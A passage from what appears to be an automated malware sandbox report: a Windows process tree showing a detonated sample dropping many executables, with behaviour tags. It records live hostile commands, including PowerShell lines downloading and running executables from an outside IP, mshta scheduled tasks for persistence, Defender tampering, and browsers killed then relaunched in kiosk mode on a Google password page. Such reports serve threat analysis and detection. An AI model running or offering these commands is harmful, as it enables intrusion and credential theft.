                                                                                                                    PID:3116
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2176 /prefetch:2
                                                                                                                  6⤵
                                                                                                                    PID:3056
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2492 /prefetch:2
                                                                                                                    6⤵
                                                                                                                      PID:5168
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                    5⤵
                                                                                                                    • Uses browser remote debugging
                                                                                                                    • Enumerates system info in registry
                                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                    PID:6036
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9302c3cb8,0x7ff9302c3cc8,0x7ff9302c3cd8
                                                                                                                      6⤵
                                                                                                                        PID:4844
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
                                                                                                                        6⤵
                                                                                                                          PID:1560
                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 1560 -s 288
                                                                                                                            7⤵
                                                                                                                              PID:4780
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                                                                                                                            6⤵
                                                                                                                              PID:2392
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
                                                                                                                              6⤵
                                                                                                                                PID:5948
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                                                                                                6⤵
                                                                                                                                • Uses browser remote debugging
                                                                                                                                PID:5232
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
                                                                                                                                6⤵
                                                                                                                                • Uses browser remote debugging
                                                                                                                                PID:5988
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1888 /prefetch:2
                                                                                                                                6⤵
                                                                                                                                  PID:5272
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2228 /prefetch:2
                                                                                                                                  6⤵
                                                                                                                                    PID:2044
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3988 /prefetch:2
                                                                                                                                    6⤵
                                                                                                                                      PID:6220
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4820 /prefetch:2
                                                                                                                                      6⤵
                                                                                                                                        PID:6304
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2316 /prefetch:2
                                                                                                                                        6⤵
                                                                                                                                          PID:6380
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1
                                                                                                                                          6⤵
                                                                                                                                          • Uses browser remote debugging
                                                                                                                                          PID:4760
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1
                                                                                                                                          6⤵
                                                                                                                                          • Uses browser remote debugging
                                                                                                                                          PID:3128
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\sjmgv" & exit
                                                                                                                                        5⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:7088
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 10
                                                                                                                                          6⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:660
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1090366101\c9aa4cecce.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1090366101\c9aa4cecce.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                    PID:3172
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c schtasks /create /tn wnekpmaqpoN /tr "mshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                      4⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4128
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /create /tn wnekpmaqpoN /tr "mshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                        5⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3776
                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                      mshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta
                                                                                                                                      4⤵
                                                                                                                                        PID:4432
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3696
                                                                                                                                          • C:\Users\Admin\AppData\Local\TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
                                                                                                                                            "C:\Users\Admin\AppData\Local\TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE"
                                                                                                                                            6⤵
                                                                                                                                            • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                            • Modifies Windows Defender TamperProtection settings
                                                                                                                                            • Modifies Windows Defender notification settings
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                            • Windows security modification
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:1560
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" "
                                                                                                                                      3⤵
                                                                                                                                        PID:4148
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" any_word
                                                                                                                                          4⤵
                                                                                                                                            PID:4996
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 2
                                                                                                                                              5⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:3264
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                              5⤵
                                                                                                                                                PID:4940
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                  6⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4512
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                5⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5356
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                  6⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4812
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                5⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5368
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                  6⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:72
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /create /tn "RDro5malfmZ" /tr "mshta \"C:\Temp\DZx0zsVul.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                5⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:5636
                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                mshta "C:\Temp\DZx0zsVul.hta"
                                                                                                                                                5⤵
                                                                                                                                                  PID:5540
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                    6⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Downloads MZ/PE file
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:5804
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                      7⤵
                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3244
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:4432
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1090372001\a8a5b07bf4.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1090372001\a8a5b07bf4.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:5208
                                                                                                                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:412
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090373001\d74640f13d.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090373001\d74640f13d.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1692
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090374001\afaefd507f.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090374001\afaefd507f.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3792
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090375001\67152b305c.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090375001\67152b305c.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5944
                                                                                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Downloads MZ/PE file
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5580
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090376001\d35ce9d381.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090376001\d35ce9d381.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1076
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090377001\33f82ae2b0.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090377001\33f82ae2b0.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2680
                                                                                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Downloads MZ/PE file
                                                                                                                                                  PID:3960
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090378001\1cc9b19df2.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090378001\1cc9b19df2.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:3116
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3116 -s 1596
                                                                                                                                                  4⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:1092
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090379001\5a903ed074.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090379001\5a903ed074.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3244
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090380001\b91b4b1726.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090380001\b91b4b1726.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2436
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1090381001\54352f7f9d.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1090381001\54352f7f9d.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:1752
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM firefox.exe /T
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:1884
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM chrome.exe /T
                                                                                                                                                  4⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4892
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM msedge.exe /T
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:1016
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM opera.exe /T
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:5932
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM brave.exe /T
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:5660
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                  4⤵
                                                                                                                                                    PID:6004
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                      5⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:912
                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
